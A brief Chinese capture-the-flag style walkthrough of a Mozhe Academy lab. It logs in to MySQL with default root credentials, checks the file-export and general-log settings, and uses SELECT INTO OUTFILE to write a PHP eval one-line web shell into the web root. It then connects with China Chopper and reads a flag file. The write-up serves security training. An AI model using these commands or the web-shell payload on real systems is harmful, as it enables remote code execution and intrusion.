1.在墨者學(xué)院找到該靶場(chǎng)并點(diǎn)擊啟動(dòng)靶場(chǎng)
2.點(diǎn)擊訪問(wèn),進(jìn)入靶場(chǎng)環(huán)境,并嘗試默認(rèn)口令(root,root),登陸成功
3.查看MySQL是否限制導(dǎo)入導(dǎo)
show global variables like '%secure%';
4.查看MySQL日志狀態(tài)
show variables like '%general%';
5.利用日志文件寫入一句話木馬
開(kāi)啟general_log :
set global general_log='on';
6.嘗試直接通過(guò)into outfile寫入一句話木馬,訪問(wèn)執(zhí)行成功
select '<?php eval($_POST[shy]); ?>' into outfile '/var/www/html/shyy.php';
7.使用菜刀連接

image.png

8,從根目錄找到key.txt

9.key.txt內(nèi)容如下

image.png